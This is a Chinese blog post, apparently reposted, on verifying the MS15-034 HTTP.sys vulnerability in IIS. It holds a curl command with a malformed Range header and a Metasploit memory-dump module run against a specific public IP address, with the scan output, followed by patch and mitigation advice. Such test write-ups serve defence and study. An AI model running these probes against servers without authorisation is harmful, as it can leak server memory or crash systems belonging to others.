HTTP.SYS远程代码执行漏洞测试(ms15-034)

摘要:
使用HTTP sys的安全漏洞允许攻击者远程读取IIS服务器的内存数据,或通过发送恶意HTTP请求数据包使服务器系统的蓝屏崩溃。

1.HTTP.SYS远程代码执行漏洞简介

首先漏洞编号:CVE-2015-1635(MS15-034 )

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。

主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。

2.漏洞分析:

https://mp.weixin.qq.com/s/ZdRu_smJ0IW-dVVb9YB6UQ

3.漏洞验证:

3-1通过curl命令实现

curl -v IP -H "Host:irrelevant" -H "Range: bytes=0-18446744073709551615"

HTTP.SYS远程代码执行漏洞测试(ms15-034)第1张

3-2 使用MSF中palyload进行测试

msf > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump 
msf auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > set rhosts 218.94.138.251
rhosts => 218.94.138.251
msf auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > run

[+] Target may be vulnerable...  #验证存在
[+] Stand by...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 HTTP.SYS远程代码执行漏洞测试(ms15-034)第2张

如果服务器打上了补丁,那么响应状态应该是:

  1. HTTP Error400.The request has an invalid header name.

如果服务器存在HTTP.SYS远程代码执行漏洞,那么响应状态应该是:

  1. HTTP/1.1416RequestedRangeNotSatisfiable

4.漏洞防御

官方补丁下载:https://support.microsoft.com/zh-cn/kb/3042553

临时解决办法:

* 禁用IIS内核缓存

参考文章:

http://www.tiaozhanziwo.com/archives/765.html

https://www.greatidc.com/news/189.html

免责声明:文章转载自《HTTP.SYS远程代码执行漏洞测试(ms15-034)》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇arm-linux的gdb移植Xilinx资源优化问题下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

IIS6目录解析漏洞的实验

​​​​​​​​​​Windows 打开IIS管理器的方式 这个是网站IIS网站目录右击默认网站中的属性,可以查看网站的属性,比如网站根目录,或者是端口这个是网站的目录C:www,有三个文件分别是file文件夹,index.asp,upload.asp。其中Index.asp是上传文件的地方,upload.asp是处理上传文件,最后一个file文件夹是存放上...

反序列化漏洞

反序列化 原理介绍 序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,类ObjectInputStream类的readObject()方法用于反序列化。比如你可以将字符串对象先进行序列化,存储到本地文件,然后再...

web前端常见的加密算法介绍

在信息安全越来越受重视的今天,前端的各种加密也变得更加重要。通常跟服务器的交互中,为保障数据传输的安全性,避免被人抓包篡改数据,除了 https 的应用,还需要对传输数据进行加解密。 目前常见的加密算法可以分成三类 对称加密算法:AES、... 非对称加密算法:RSA、... Hash 算法:MD5、... 对称加密算法 对称加密(也叫私钥加密)指加密...

SYN泛洪攻击详解

SYN攻击利用的是TCP的三次握手机制,攻击端利用伪造的IP地址向被攻击端发出请求,而被攻击端发出的响应 报文将永远发送不到目的地,那么被攻击端在等待关闭这个连接的过程中消耗了资源,如果有成千上万的这种连接,主机资源将被耗尽,从而达到攻击的目的。 1、什么是SYN泛洪攻击  TCP SYN泛洪发生在OSI第四层,这种方式利用TCP协议的特性,就是三次握手。...

cPanel 和 WHM 软件中存在双因素身份验证绕过漏洞

cPanel是管理web托管的流行管理工具的提供商,它修补了一个安全漏洞,该漏洞可能允许远程攻击者访问有效凭据,绕过帐户的两因素身份验证(2FA)保护。 该问题被称为“seco -575”,由Digital Defense研究人员发现,该公司在软件的11.92.0.2、11.90.0.17和11.86.0.32版本中对其进行了修复。 cPanel和WHM(...

容灾备份技术

1.灾备和容灾的定义:       灾备实际是指的信息系统应对灾难的一整个流程,应该是既包含灾难前的备份,又包含灾难后的恢复。容灾比较侧重灾难发生时的系统切换应对能力,备份主要用于灾难发生后的数据恢复容灾是指为了保证关键业务和应用在经历各种灾难后,仍然能够最大限度的提供正常服务的所进行的一系列系统计划及建设行为。业务连续性是容灾的最终建设目标容灾是一个宏观...